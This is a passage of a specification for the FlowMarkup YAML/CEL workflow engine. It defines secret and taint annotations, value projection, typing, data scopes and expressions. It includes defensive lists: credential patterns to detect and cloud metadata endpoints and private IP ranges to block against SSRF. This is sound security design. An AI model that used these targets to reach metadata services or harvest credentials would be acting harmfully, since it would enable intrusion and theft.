> Threat model: `$exportable: false` defends against careless flow authoring. `$secret: true` defends against malicious flow authoring.

```yaml
vars:
  db_url:
    $kind: TEXT
    $exportable: false          # may contain credentials in URI
    $value: =ENV.DATABASE_URL
  auth_response:
    $kind: JSON                 # compound shorthand
    $secret: true               # entire value is secret-grade
    $value: null
```

**Auto-detection (runtime):** The engine MUST auto-detect credential patterns in string values at assignment time and apply `$exportable: false` taint automatically. At minimum, engines MUST detect: URI with userinfo (`scheme://user:pass@host`) and JWT tokens (`eyJ...` prefix with two dots). Engines SHOULD also detect known API key formats (configurable engine-level pattern list).

**`$sanitized: true`** — marks a string value as having passed through an application-level sanitization step. Setting `$sanitized: true` on a variable suppresses SA-MAIL-15 and SA-XML-3 that would otherwise fire when the value is used in HTML or XML contexts. `$sanitized` does NOT affect taint propagation — a value can be both `$secret: true` and `$sanitized: true` (sanitized for output but still tainted for tracking). Engines MUST NOT auto-set `$sanitized`. SA-TAINT-6 (ERROR) flags `$sanitized: true` on values that have not passed through a recognised sanitization function within the same flow. **Provenance requirement:** `$sanitized: true` is only valid when the value's data-flow trace shows it passed through a built-in sanitization function (`htmlSanitize()`, `htmlEscape()`, `regexQuote()`) or was returned from a service call declared as a sanitizer. Flows SHOULD use `$sanitizedBy: <function_or_service>` to declare the sanitization provenance explicitly (e.g., `$sanitizedBy: htmlSanitize` or `$sanitizedBy: "service:sanitizer.clean"`). When `$sanitizedBy` is present, the engine validates provenance at load time. When `$sanitized: true` is used without `$sanitizedBy`, SA-TAINT-6 fires at ERROR severity.

**`$trusted: true`** — marks a data element as originating from a trusted source. `$trusted` is a boolean annotation, default `false`. Trusted values are exempt from user-input taint checks: SA-EXEC-11, SA-SSH-10, SA-STORAGE-18, and SA-XML-3 do not fire on `$trusted` values even when those values appear in injection-sensitive positions. `$trusted` does NOT bypass `$secret` / `$exportable` restrictions — a value can be trusted (from admin config) yet secret (contains credentials). Engines MUST NOT auto-set `$trusted`. **Provenance restriction:** `$trusted: true` is only valid on values that trace to trusted sources: `const:` literals, `ENV.*` values, `RUNTIME.*` values, or values returned from a service declared with `trusted: true` in the engine service configuration. SA-TAINT-7 (ERROR) flags `$trusted: true` on values derived from `input:` parameters, `EVENT.DATA.*`, `request` response bodies, `exec` stdout/stderr, or CEL expressions referencing any of these. SA-TAINT-7a (WARN) flags `$trusted: true` on values derived from `CONTEXT.*` or `GLOBAL.*` (which may have been set by untrusted flows).

Static analysis: SA-TAINT-1 (ERROR) rejects `$secret: true` variables at output boundaries. SA-TAINT-2 (ERROR) rejects `$exportable: false` variables at output boundaries. SA-TAINT-3 (INFO) notes redundant `$secret` + `$exportable: false`. SA-TAINT-4 (ERROR) flags when action `result:` value is assigned to a variable from auth/credential-related operations without `$exportable: false`. SA-ENV-4 (WARN) warns on ENV values matching credential patterns assigned without `$exportable: false`.

**`$readonly: true`** — marks the data element as immutable after initial assignment. Equivalent to declaring in `const:`. Writing to a `$readonly` data element is SA-CONST-1 ERROR. When a readonly data element's value is copied to another data element via `set:`, the target does **not** inherit `$readonly` — only the value is copied. `$readonly` and `$secret` are orthogonal and can be combined. `$readonly` is NOT valid on `forEach` `as:` loop variables (the loop binding is engine-managed).

```yaml
vars:
  api_base:
    $readonly: true
    $kind: STRING
    $value: =ENV.API_HOST + "/v2"
```

At runtime, the engine decodes `$encoding`-annotated values during initialization (e.g., base64 string → `byte[]`). CEL expressions and action params receive the decoded raw value. See "Value Projection" below.

#### Value Projection (Auto-Unwrapping)

Typed declarations carry metadata (`$kind`, `$type`, `$format`, `$encoding`, `$name`, `$nullable`, `$schema`) alongside their value. The engine MUST guarantee that this metadata is **never** leaked into user-visible output — data elements always auto-project to their raw value.

**Typed value storage.** The engine stores each typed variable as an internal pair: **raw value** + **metadata**. On initialization:

- `$encoding`-annotated values are decoded into raw `byte[]`. The decoded bytes become the raw value; the original encoded string is discarded. The three `$encoding` constants (`BASE64`, `BASE64URL`, `HEX`) all produce `byte[]`. Invalid encoded data throws `ValidationError` at initialization time.
- Non-encoded `$value` passes through as-is (string, number, map, list, null).

**CEL projection rule.** CEL expressions always resolve to the **raw value**, never the metadata wrapper:

- `=thumbnail` evaluates to `byte[]` (decoded PNG bytes), not `{$kind: BINARY, $type: image/png, $value: ...}`.
- `=api_config` evaluates to `{ endpoint: "https://api.example.com" }`, not `{$kind: JSON, $value: ...}`.
- Metadata is accessible via the `meta()` CEL macro. Dot-access to `$`-prefixed properties (e.g., `variable.$type`) is not supported.

**`meta()` CEL macro.** `meta(variable)` returns a `map(string, dyn)` containing the variable's engine-internal metadata. It works on all typed variables, not just RESOURCES. `meta` is a **CEL macro** (AST-level, like `has()`), not a runtime function — because CEL evaluates arguments before passing to functions, which would trigger Value Projection and strip metadata.

| Key | Type | Available on | Description |
|---|---|---|---|
| `type` | `string` | All typed vars | MIME content type (derived from `$kind` if not explicit) |
| `kind` | `string` | All typed vars | Structural kind constant (`STRING`, `BINARY`, `MAP`, etc.) |
| `name` | `string \| null` | All typed vars | Filename hint (`null` if not declared) |
| `size` | `int \| null` | RESOURCES only | Content length in bytes (`null` for non-RESOURCES) |
| `value` | `dyn \| null` | RESOURCES only | Lazy-loaded content (`null` for non-RESOURCES) |
| `readonly` | `bool` | All data elements | `true` if the data element is readonly (`const:` or `$readonly: true`) |

Examples:
```
=meta(thumbnail).type == "image/png"
="uploads/" + meta(RESOURCES.config).name
=meta(api_response).kind == "MAP"
=meta(RESOURCES.data).size > 1000000
=meta(RESOURCES.legacy_export).value
```

Action providers (e.g., `mail`, `request`) continue to access metadata through the engine's internal variable store API.

**Auto-serialization rules.** When a value passes through a serialization boundary, the engine transforms it based on the target context:

| Context | Binary (`byte[]`) | Non-binary values |
|---|---|---|
| **JSON serialization** (params, return, `request` body `json:`, `value.encode(JSON)`) | Base64-encoded string | Pass through as-is |
| **YAML serialization** (checkpointing, `value.encode(YAML)`) | `!!binary` tag with base64 | Pass through as-is |
| **String concatenation** (`+` in CEL) | Base64-encoded string | Auto-stringify (existing rule) |
| **Template interpolation** (`{{thumbnail}}`) | Base64-encoded string | Auto-stringify (existing rule) |
| **Logging** (`log:`) | `<binary N bytes>` summary | Auto-stringify |
| **HTTP request body** (`request` action, `raw:` or string shorthand) | Raw bytes (engine sets Content-Type from `$type`/`$kind` metadata) | Pass through |
| **HTTP multipart part** (`request` body `multipart:`) | Raw bytes (engine uses `$type`/`$kind` for part Content-Type, `$name` for filename) | Pass through |
| **Mail attachment** (bare variable ref) | Raw bytes for attachment body; `$type`/`$kind` → Content-Type, `$name` → filename | Pass through |
| **Mail attachment** (object form `{data:, ...}`) | Raw bytes; explicit `contentType:` overrides the value's `$type`/`$kind` metadata; `name:` overrides `$name` | Pass through |
| **Sub-flow params** (`run`/`call` `params:`) | Projected via CEL (raw bytes) | Projected via CEL |

**Key principle:** At **wire/serialization boundaries** (JSON, YAML, string), bytes become base64. At **binary-native boundaries** (HTTP body, multipart, mail attachment), bytes stay as raw bytes and the engine uses metadata for Content-Type/filename.

**Source-format serialization.** At binary-native boundaries (HTTP request body, multipart part, mail attachment), non-binary typed values with explicit `$type` metadata are serialized in the format indicated by `$type` — not defaulting to JSON. The engine applies the format-appropriate serializer:

| `$type` | Serialization |
|---|---|
| `application/json` | JSON text |
| `application/yaml` | YAML text |
| `application/xml` | XML text |
| `text/csv` | CSV text (RFC 4180) |
| `text/tab-separated-values` | TSV text |

If the engine has cached the original source bytes (from RESOURCE load, HTTP response, exec stdout, or `decode()`/`parse()`), it SHOULD use those exact bytes for byte-level fidelity. Otherwise, it re-serializes from the in-memory representation. Values without explicit `$type` metadata (or with `$type: application/json`) use JSON serialization as the default. This ensures that a CSV-typed variable sent as an email attachment arrives as CSV text, not as a JSON array.

**Cross-scope writes.** When writing a typed variable to `GLOBAL.*`, the engine stores the raw value only — `$kind`/`$type`/`$format`/`$name`/`$encoding` metadata is flow-local and does not propagate to the engine-wide global store. `CONTEXT.*` writes preserve the full `TypedValue` (metadata + raw value) since the execution chain shares type expectations between caller and sub-flow.

#### 2.4.1 Structural Types (`types:`)

`types:` declares named types as JSON Schema (Draft 2020-12). Keys are PascalCase (`^[A-Z][a-zA-Z0-9]*$`).

```yaml
types:
  Order:
    type: object
    properties:
      id: { type: string }
      status: { type: string, enum: [pending, processing, shipped] }
    required: [id, status]
  Customer: { $ref: "schemas/customer.schema.json" }
```

External schemas loaded via `$ref`. HTTP/HTTPS URLs supported with optional `integrity:` pinning (SA-TYPE-11 for `http://`, SA-TYPE-12 warns for `https://` without integrity). `$ref` supports JSON Pointer fragments.

**Schema fetch security:** Schema fetches via `$ref` URLs MUST be subject to the same origin restrictions as the `REQUEST` capability — the engine MUST NOT allow schema `$ref` URLs to reach internal network endpoints not authorized by the engine's configuration. The engine MUST resolve DNS at fetch time and validate the resolved IP address — not just the hostname — against private/internal IP ranges before connecting. This prevents DNS rebinding attacks where an allowed hostname resolves to an internal IP after the initial allowlist check. The engine MUST pin the resolved IP for the duration of the schema fetch. Private/internal IP ranges: `10.*`, `172.16-31.*`, `192.168.*`, `127.*`, `169.254.*`, `::1`, `fc00::/7`, `fd00::/8`, `fe80::/10`. Schema fetches MUST follow the same redirect origin enforcement as the `request` action (§4.3): each redirect target MUST be validated against private/internal IP ranges before connecting, and the engine MUST NOT follow redirects to origins not authorized by the engine's schema-fetch configuration. Maximum redirect depth: 5. SA-TYPE-14 (ERROR) rejects `$ref` schema fetches that receive a redirect to a private/internal IP range. The engine SHOULD cache resolved schemas by content hash and serve from cache on subsequent loads. For `https://` URLs, the engine SHOULD support SRI-style `integrity:` pinning on `$ref` values. SA-TYPE-13 warns when a `$ref` URL targets a private/internal IP range.

**Additional SSRF hardening.** IPv4-mapped IPv6 addresses (`::ffff:0.0.0.0/96`) MUST be normalized to their IPv4 equivalent before range checks. Cloud metadata endpoints MUST be blocked by both IP and hostname: `169.254.169.254`, `fd00:ec2::254`, `metadata.google.internal`, `metadata.azure.com`, `100.100.100.200` (Alibaba), `169.254.169.254:*` (any port). Schema `$ref` URLs MUST use `https://` scheme. `http://` is permitted only when `integrity:` is also specified. All other schemes (`file://`, `ftp://`, `gopher://`, `data://`) MUST be rejected with `SchemaResolutionError`. URLs containing embedded credentials (`user:pass@host`) MUST be rejected. *(CWE-918)*

**`$schema:` on `paramDef`** -- associates a structural type with a parameter:
```yaml
input:
  order: { $schema: Order }             # MAP inferred from schema; or { $kind: JSON, $schema: Order }
```

**`$enum:` shorthand** -- mutually exclusive with `$schema:`:
```yaml
input:
  priority: { $enum: [low, normal, high, critical] }   # STRING inferred from $enum
```

**`$schema:` on `typedVar`** -- associates a structural type with a variable.

Types are optional annotations. Flows without `types:` work unchanged.

**Error types:** `SchemaLoadError` (malformed schema), `SchemaResolutionError` (unresolvable `$ref`).

#### 2.4.2 Constants (`const:`)

> The `const:` section declares readonly data elements. All entries are implicitly `$readonly: true`.

Immutable flow-local data elements, initialized before `vars:` and `do:`. CEL scope limited to `ENV.*`, `SECRET.*`, `GLOBAL.*`, `CONTEXT.*`, `RUNTIME.*` (SA-INIT-1). Writing to a `const` at runtime is a hard error (SA-CONST-1).

`SECRET.*` values stored in constants remain opaque `SecretValue` handles. The constant simply holds a reference — no inspection or coercion occurs. The value is resolved at action boundaries, just like direct `SECRET.*` references.

Init order: `const:` -> `vars:` -> `do:`.

#### 2.4.3 Number Semantics

All YAML number literals are stored as exact decimal at runtime. `0.1 + 0.2` equals exactly `0.3`.

#### Kind Constants (CEL Bindings)

Kind constants are listed in §1.3 (Unified Type System). The same constants are available as top-level CEL bindings (e.g., `STRING`, `NUMBER`, `BINARY`).

#### Compound Shorthand Constants (CEL Bindings)

| Shorthand | Expands to |
|---|---|
| `JSON` | `$kind: MAP, $type: application/json` |
| `YAML` | `$kind: MAP, $type: application/yaml` |
| `XML` | `$kind: MAP, $type: application/xml` |
| `CSV` | `$kind: ARRAY, $type: text/csv` |
| `TSV` | `$kind: ARRAY, $type: text/tab-separated-values` |

These shorthands are accepted in `$kind` positions and as bare paramDef values. The engine expands them at load time.

#### Encoding Constants

**`$encoding` constants** (3) — for binary-to-string encoding on `typedVar`/`set:` declarations:

| Constant | Encoding |
|---|---|
| `BASE64` | RFC 4648 standard base64 |
| `BASE64URL` | RFC 4648 URL-safe base64 |
| `HEX` | hexadecimal |

**CEL `encode()`/`decode()` constants** (8) — for runtime value transformation:

| Constant | Encoding |
|---|---|
| `BASE64` | RFC 4648 standard base64 |
| `BASE64URL` | RFC 4648 URL-safe base64 |
| `HEX` | hexadecimal |
| `UTF8` | UTF-8 |
| `UTF16BE` / `UTF16LE` | UTF-16 big/little-endian |
| `UTF32BE` / `UTF32LE` | UTF-32 big/little-endian |

#### Character Encoding Detection

Flow definition files MUST be UTF-8 (§2.1). However, text content loaded from external sources — RESOURCES files, `exec` stdout/stderr, HTTP response bodies, `decode()`/`parse()` input — may use any character encoding. The engine MUST perform best-effort encoding auto-detection for all text-based content types (TEXT, MARKDOWN, JSON, YAML, XML, CSV, TSV, and any MIME type with a `text/` prefix).

**Detection priority (highest to lowest):**

1. **`$charset` declaration** — on typedVar or requiresResourceEntry. When present, the engine MUST use the declared charset.
2. **Explicit MIME charset** — from HTTP `Content-Type` header or RESOURCES provider metadata (NOT from `$type`, which doesn't allow parameters). When present, the engine MUST use the declared charset.
3. **BOM (Byte Order Mark)** — The engine MUST recognize BOM sequences: UTF-8 (`EF BB BF`), UTF-16 BE (`FE FF`), UTF-16 LE (`FF FE`), UTF-32 BE (`00 00 FE FF`), UTF-32 LE (`FF FE 00 00`). The BOM is consumed and not included in the decoded text.
4. **Heuristic detection** — When no explicit charset or BOM is present, the engine SHOULD apply statistical character encoding detection (e.g., ICU `CharsetDetector` or equivalent). Common encodings to detect: UTF-8, ISO-8859-1 (Latin-1), Windows-1252, Shift_JIS, EUC-JP, EUC-KR, GB2312/GBK, Big5.
5. **Fallback** — If heuristic detection fails or returns low confidence, the engine MUST fall back to UTF-8. Invalid byte sequences under the detected encoding SHOULD raise `ParseError` rather than silently replacing characters.

The engine normalizes all decoded text content to its internal string representation (e.g., UTF-16 in Java/C#, UTF-8 in Go/Rust). The original bytes SHOULD be cached alongside the decoded text for source-format serialization fidelity at binary-native boundaries (see Value Projection).

This applies uniformly to all text-based formats — not just CSV/TSV. A JSON file saved in Shift_JIS, a YAML file in Latin-1, or a plain TEXT resource in Windows-1252 are all decoded correctly through the same pipeline.

#### Format-Validated String Subtypes

| Constant | Description |
|---|---|
| `URI` | Any URI (RFC 3986) |
| `URL` | HTTP/HTTPS URL |
| `EMAIL` | Email address |
| `FILENAME` | Safe filename (no path separators) |
| `IP` | IPv4 or IPv6 address |
| `UUID` | UUID (any variant/version) |

Format-validated subtypes are usable wherever `$kind` is expected. They expand to `STRING` with a built-in format constraint:

```yaml
# These two declarations are equivalent:
recipient: EMAIL
recipient: { $kind: STRING, $format: "^[^@]+@[^@]+$" }  # (simplified — actual regex per RFC 5322)
```

Format validation fires on assignment. Failed validation raises `ValidationError`.

#### Nullability

| Context | Auto-derived nullability |
|---|---|
| `vars: { x: null }` | nullable |
| `vars: { x: 0 }` | not nullable |
| `typedVar` with `$value: null` | nullable |
| `typedVar` with `$value: <non-null>` | not nullable |
| `const:` | never nullable |
| `input.required` without `$default:` | not nullable |
| `input.required` with `$default: null` | nullable |
| `input.optional` without `$default:` | nullable |

Explicit `$nullable: true/false` overrides auto-derivation. Assigning `null` to a non-nullable variable raises `ValidationError`. See SA-NULL-1, SA-NULL-2.

**Mutual implication rules — either form is sufficient, both together are redundant:**

- `$default: null` implies `$nullable: true`. A param that defaults to `null` is inherently nullable.
- `$nullable: true` on an input param without `$default:` implies `$default: null` — the param becomes optional and defaults to `null` when not provided.
- `$nullable: true` on a `vars:`/`set:` declaration without `$value:` implies `$value: null`.

These rules mean `{$nullable: true, $default: null}` is equivalent to just `{$nullable: true}` or just `{$default: null}` — use whichever communicates intent more clearly. SA-NULL-3 (INFO) warns when both are specified redundantly.

> **Nullability recommendation:** Flow authors SHOULD declare nullability explicitly on all input parameters and variables that may hold `null` at runtime. Relying solely on auto-derivation (from `$default: null` or `$value: null`) obscures intent and makes flows harder to review. When a parameter is intentionally non-nullable, omitting `$nullable` is sufficient — but adding `$nullable: false` as an explicit assertion is acceptable for documentation purposes and does not trigger SA-NULL-3.

> **Required but nullable:** To declare an input parameter that the caller must explicitly provide but may pass as `null`, use the structured `required:` form: `required: { x: { $kind: STRING, $nullable: true } }`. The `required:` placement makes the parameter mandatory; `$nullable: true` permits `null` as an explicit value without implying `$default: null`.

### 2.5 Data Element Scopes

| Prefix | Scope | Mutability | Example |
|---|---|---|---|
| *(none)* or `LOCAL.` | Flow-local | read/write | `counter`, `LOCAL.counter` |
| `CONTEXT.` | Execution chain | read/write | `CONTEXT.correlation_id` |
| `GLOBAL.` | Global (per-tenant) | read/write | `GLOBAL.request_count` |
| `ENV.` | Environment | **read-only** | `ENV.API_KEY` |
| `SECRET.` | Secrets provider | **read-only, opaque** | `SECRET.api_token` |
| `RUNTIME.` | Runtime metadata | **read-only** | `RUNTIME.OS.NAME` |

**Flow-local (`LOCAL.`):** `LOCAL.counter` and `counter` refer to the same variable.

**Context (`CONTEXT.`):** Shared across root flow + all transitive sub-flows. Per-key access control (aligned with GLOBAL model). Flows MUST declare which CONTEXT keys they access in `requires: { CONTEXT: [...] }` (SA-CTX-1, ERROR). Accessing an undeclared key raises `MissingCapabilityError`. `async: true` sub-flows receive a **deep clone** of declared `CONTEXT.*` keys at invocation time (changes not back-propagated). `GLOBAL.*` is NOT snapshotted — async sub-flows read/write the live global store. `ENV.*`, `SECRET.*`, and `RUNTIME.*` are always live references.

Omitting `CONTEXT:` from `requires:` means no CONTEXT keys are accessible (the default is no access).

**CONTEXT per-key access control:** `requires: { CONTEXT: [key1, key2] }` grants read-write on the listed keys. `requires: { CONTEXT: { read: [key1], write: [key2] } }` provides separate per-key read and write lists. SA-CTX-2 (ERROR) rejects writes to keys not in the write list when the object form is used. SA-CTX-3 (WARN) warns on read-modify-write patterns without `lock:`. Sub-flow CONTEXT propagation: parent's `cap:` can further restrict CONTEXT keys passed to the sub-flow. SA-RUN-8 updated: async sub-flows with CONTEXT write keys declared — the writes will be lost (deep clone, not shared).

**Global (`GLOBAL.`):** Shared across all flow instances within the same tenant. Individual writes are atomic; read-modify-write is NOT transactional (last-writer-wins). The engine MUST enforce tenant isolation. Flows that reference `GLOBAL.*` MUST declare per-key access in `requires: { GLOBAL: [...] }` (SA-GLOBAL-1, ERROR).

**Per-key access control (GLOBAL and CONTEXT):** When `requires: { GLOBAL: [key1, key2] }` is declared, the engine MUST restrict the flow's GLOBAL access to only those keys (both read and write). Accessing an undeclared key raises `MissingCapabilityError`. The per-key array form grants `READ_WRITE` on the listed keys. Object form `{ read: [...], write: [...] }` provides separate per-key read and write lists. The same model applies to CONTEXT.

**Single-step read-modify-write on `GLOBAL.*` is automatically atomic.** The engine uses transparent OCC retry to ensure that `GLOBAL.x: =GLOBAL.x + 1` in a single `set:` step executes correctly under concurrent access. No explicit `lock:` is needed for single-step patterns. **Multi-step patterns on `GLOBAL.*` require explicit `lock:`.** If you read a GLOBAL key in one step and write it in another, use `lock:` to prevent interleaving. The same per-step atomicity applies to `CONTEXT.*` and `LOCAL.*` (within concurrent branches).

> **OCC retry limit.** The engine MUST enforce a configurable per-step OCC retry limit for GLOBAL.* read-modify-write (default: 100, maximum: 1,000). When retries are exhausted, the engine MUST raise `ConflictError`. Under high contention, flow authors SHOULD use explicit `lock:` instead of relying on OCC. *(CWE-400)*

> **GLOBAL value limits.** The engine MUST enforce a configurable per-value size limit for `GLOBAL.*` values (default: 1 MB, configurable maximum: 10 MB). Values exceeding the limit MUST be rejected with `ResourceExhaustedError`. The engine MUST enforce a configurable per-tenant total `GLOBAL.*` storage limit (default: 100 MB). The engine MUST NOT allow `GLOBAL.*` values to persist indefinitely — engines MUST support a configurable default TTL (default: 24 hours, configurable; `0` means no expiration). In high-security mode, the engine MUST audit-log all `GLOBAL.*` write operations including the flow instance ID, key name, value size, and operation type (set/delete). *(CWE-400, CWE-778)*

**Environment (`ENV.`):** Read-only. Missing variables evaluate to `null`.

**Secret (`SECRET.`):** Read-only, opaque `SecretValue` handles. Cannot be inspected, compared, or concatenated. Resolved only at action boundaries. Requires `SECRET` capability.

**Runtime (`RUNTIME.`):** Read-only, engine-populated. Structure: `RUNTIME.OS.{NAME,VERSION,ARCH}`, `RUNTIME.ENGINE.{NAME,VENDOR,VERSION}`, `RUNTIME.PLATFORM.{NAME,VERSION}`. Requires `requires: { RUNTIME: true }` (SA-RT-1). Any write is a hard error (SA-RT-2).

- `RUNTIME.ASYNC_SECURITY_ERRORS`: INTEGER (read-only) — Count of security-class errors (`MissingCapabilityError`, `SecretAccessError`, `AuthenticationError`, `AccessDeniedError`) from async sub-flows of this flow instance. Monotonically increasing. Requires: `RUNTIME` capability.

**Resources (`RESOURCES`):** `map(string, Resource | null)` of content-centric resource handles. Resources are opaque handles. Access metadata via the `meta()` macro: `meta(RESOURCES.config).name`, `meta(RESOURCES.config).size`. Lazy content: `meta(RESOURCES.config).value`. The engine SHOULD load resource content atomically (read once, cache in memory). When `meta(resource).value` is first accessed, the engine reads the file and caches the result for the flow instance duration. Subsequent `.value` accesses return the cached content. For `exec` steps, resource references auto-map to their filesystem path. Requires `requires: { RESOURCES: ... }`. Read-only (SA-RES-2). SA-RES-1 warns on undeclared access. File extension inference:

| Extension | Inferred Kind |
|---|---|
| `.json` | JSON (MAP) |
| `.yaml`, `.yml` | YAML (MAP) |
| `.csv` | CSV (ARRAY) |
| `.tsv` | TSV (ARRAY) |
| `.xml` | XML (MAP) |
| `.txt` | TEXT |
| `.md` | MARKDOWN |

When `meta(resource).value` is accessed on a text-based resource, the engine applies character encoding detection (see §2.4 Character Encoding Detection) before format-specific parsing. `$charset` on a requiresResourceEntry declaration provides the highest-priority charset override for that resource's content.

**Reserved prefixes:** `GLOBAL.`, `CONTEXT.`, `LOCAL.`, `RUNTIME.`, `ENV.`, `SECRET.` are reserved. Flow-local names MUST NOT start with reserved prefixes (except `LOCAL.`).

### 2.6 Flow-Level Services (`services:`)

```yaml
services:
  db:
    provider: progralink.clients.db.postgres    # static, NOT CEL
    properties:
      host: =ENV.DB_HOST
      port: 5432
      password: =SECRET.db_password
```

`provider:` is a static string (same carve-out as `exec.command:`, `throw.error:`). Provider IDs are reverse-DNS dot-namespaced strings.

`properties:` values are evaluated as CEL on first invocation of any operation on that service within the flow instance. Once evaluated, property values are cached for the flow instance's lifetime. Only `ENV.*`, `SECRET.*`, and plain literals are in scope (SA-SVC-4).

Alias keys MUST match `^[a-z][a-z0-9_]*$`.

**`SERVICES.<alias>.meta`** -- read-only CEL map with standard keys: `meta.provider`, `meta.type`, `meta.version`, `meta.operations`. Writing to `SERVICES.*` is a static analysis error (SA-SVC-8).

**`requires.SERVICES`** -- typed object form declares protocol and operations:
```yaml
requires:
  SERVICES:
    db:
      provider: progralink.clients.db.sql
      operations: [query, scalar]
```

**`cap.SERVICES`** -- supports object form for alias remapping on `run`:
```yaml
cap:
  SERVICES:
    db: =SERVICES.analytics_db
```

### 2.7 Expressions

#### The `=` Expression Prefix

| Value | Syntax | Example |
|---|---|---|
| CEL expression | `=<expr>` | `condition: =score > 0.8` |
| String literal | plain scalar | `status: pending` |
| Template string | `"text {{expr}} text"` | `log: "Processing {{order.id}}"` |
| YAML native type | unquoted YAML | `count: 0`, `active: true` |

Quotes go **outside** `=` -- they are YAML syntax, not part of the expression.

#### Expression Context Properties

| Category | Properties |
|---|---|
| Boolean guards | `if.condition`, `while.condition`, `break.condition`, `continue.condition`, `catch[].condition`, action `condition`, `branches.<name>.condition` |
| Iterables | `forEach.items` |
| Repeat condition | `repeat.until`, `forEach.completionCondition` |
| Switch value | `switch.value` |
| Assert | `assert` (shorthand), `assert.condition`, `assert.message` |
| Return | `return` (shorthand), `return.*` (object values) |
| Yield | `yield` (shorthand), `yield.*` (object values) |
| Log | `log` (shorthand), `log.message` |
| Throw | `throw.message`, `throw.data.*` (values) |
| Set | `set.*` (values) |
| Input | `input.*` (values) |
| Service | `call.service`, `call.operation` |
| Scope | `emit.scope`, `waitFor.scope`, `lock.scope` (when dynamic) |
| Wait | `wait` (string form), `wait.duration` |
| Wait-until | `waitUntil` (shorthand), `waitUntil.timestamp` |
| Lock name | `lock.name` |
| Enum fields | `group.mode`, `log.level`, `lock.mode`, `retry.backoff`, `request.method` |
| Request | `request.url`, `request.host`, `request.path`, `request.query.*`, `request.headers.*`, `request.auth.*`, `request.body.*` |
| Typed var sentinels | `$kind`, `$type`, `$format`, `$encoding`, `$name`, `$value` (YAML declaration keys, not CEL accessors) |
| Vars/const init | `vars.*` / `const.*` string values |

#### Static Properties (Never CEL)

| Category | Properties |
|---|---|
| Flow metadata | `flow.title`, `flow.documentation`, `flow.version` |
| Step metadata | `*._label_`, `*._notes_`, `*._meta_`, `*._id_` |
| Duration literals | `timeout` (when matching `^\d+(ms|[smhd])$`) |
| Sub-flow refs | `run.flow`, `run.integrity`, `run.cap` |
| Error types | `throw.error`, `catch` map keys |
| Variable binding names | `forEach.as`, `forEach.index`, `set` keys, `return` keys, `vars` keys |
| Match values | `switch.match` keys |
| Declaration metadata | `paramDef.$kind`, `paramDef._notes_`, `paramDef.$default`, etc. |
| Service definition | `services.<alias>.provider` |
| Exec command | `exec.command` |
| Event types | `emit.event`, `waitFor.event` |

#### String Template Interpolation (`{{ }}`)

String values (no `=` prefix) support `{{ expr }}` interpolation. Any CEL expression inside `{{ }}` is evaluated and auto-coerced to string. Template interpolation is single-pass: if a resolved value contains `{{ }}` sequences, they are treated as literal text, not re-evaluated. This prevents template injection via user-controlled data. Prohibited on `=`-prefixed fields (SA-INTERP-1). `{{SECRET.key}}` is SA-SECRET-20 (hard error). Escape literal `{{` with `\{{`.

#### Duration/Timeout Disambiguation

- **Integer** -> milliseconds
- **String matching `^\d+(ms|[smhd])$`** -> duration literal
- **`=`-prefixed string** -> CEL expression

Engines SHOULD reject duration values exceeding a configurable maximum (recommended default: 365d). Durations in the millions-of-days range are likely authoring errors.

#### Nested Objects in Expression Contexts

In `set.*`, `input.*`, `throw.data.*`, `return.*`, the engine recursively evaluates `=`-prefixed strings inside nested objects. Non-strings and plain strings pass through. When a resolved value is a typed variable, the engine projects (unwraps) the raw value, stripping all metadata. Binary (`byte[]`) values within serialized objects/arrays are auto-encoded as base64 strings.

#### Expression Engine

**Recommended: Google Common Expression Language (CEL).** CEL is sandboxed by design (non-Turing complete, no I/O, no side effects).

FlowMarkup targets CEL specification v0.15 ([github.com/google/cel-spec](https://github.com/google/cel-spec)). Library versions in CROSSLANG.md CL-5 are tested against this specification version.

> **Implementation maturity:** Not all target languages have production-ready CEL and YAML 1.2 libraries. Rust and C# have known ecosystem gaps — see [FLOWMARKUP-ENGINE-CROSSLANG.md](FLOWMARKUP-ENGINE-CROSSLANG.md) CL-5 and CL-6 for current library status and recommended mitigations.

**Host-language introspection MUST be blocked.** The engine MUST NOT expose reflection, meta-methods, or prototype chain access through CEL. Enforcement MUST use explicit allowlists, never auto-exposure.

#### Built-in CEL Bindings

| Identifier | Type | Description |
|---|---|---|
| `GLOBAL` | `map(string, dyn)` | Global variables. Read/write. |
| `CONTEXT` | `map(string, dyn)` | Execution-chain variables. Read/write. |
| `LOCAL` | `map(string, dyn)` | Flow-local scope as explicit map. |
| `ENV` | `map(string, string)` | OS environment. Read-only. |
| `SERVICES` | `map(string, ServiceHandle)` | Service registry. Read-only (SA-SVC-8). |
| `ERROR` | `map(string, dyn)` | Caught error (in `catch` blocks). Fields: `TYPE`, `MESSAGE`, `STEP`, `DATA`, `CAUSE`. |
| `EVENT` | `map(string, dyn)` | Current event (in `waitFor`/triggers). Fields: `TYPE`, `DATA`, `SOURCE` (SA-EVENT-8). |
| `SECRET` | `map(string, SecretValue)` | Secrets. Read-only, opaque. |
| `RUNTIME` | `map(string, map(string, string))` | Runtime metadata. Read-only. Requires capability. |
| `RESULT` | `map(string, dyn)` | Action return value (in `result:` expressions). Always refers to the step's own action result, not any inline service call sub-expressions within `params:`. |
| `RESOURCES` | `map(string, Resource \| null)` | Resource handles. Read-only. Requires capability. Access metadata via `meta()` macro (§2.5). |
| `YIELD` | `map(string, dyn)` | Current yielded element (in `onYield.do:`). Fields: `VALUE`, `INDEX`. |
| `MIGRATION` | `map(string, dyn)` | Version migration context (in `onVersionChange:`). |
| `RESULTS` | `list(map(string, dyn))` | Concurrent `forEach` only | Thread-safe accumulation array. Each completed iteration appends its result map. Available inside `completionCondition` and after the `forEach` completes. Read-only outside the engine's append logic. The `RESULTS` array size is bounded by `maxItems` and subject to per-instance memory limits. **Ordering:** Elements appear in completion order (non-deterministic for `PARALLEL` mode). Flow authors MUST NOT rely on `RESULTS` element ordering matching the input collection order — use `RESULTS[i].INDEX` to correlate results with their source items when ordering matters. For `SEQUENCE` mode, completion order matches input order. |
| Mode constants | `string` | `SEQUENCE`, `PARALLEL`, `RACE` |
| Level constants | `string` | `TRACE`, `DEBUG`, `INFO`, `WARN`, `ERROR` |
| Lock constants | `string` | `SHARED`, `EXCLUSIVE` |
| Backoff constants | `string` | `FIXED`, `LINEAR`, `EXPONENTIAL` |
| HTTP constants | `string` | `GET`, `POST`, `PUT`, `DELETE`, `PATCH`, `HEAD`, `OPTIONS` |
| Scope constants | `string` | `LOCAL`, `CONTEXT`, `GLOBAL` |
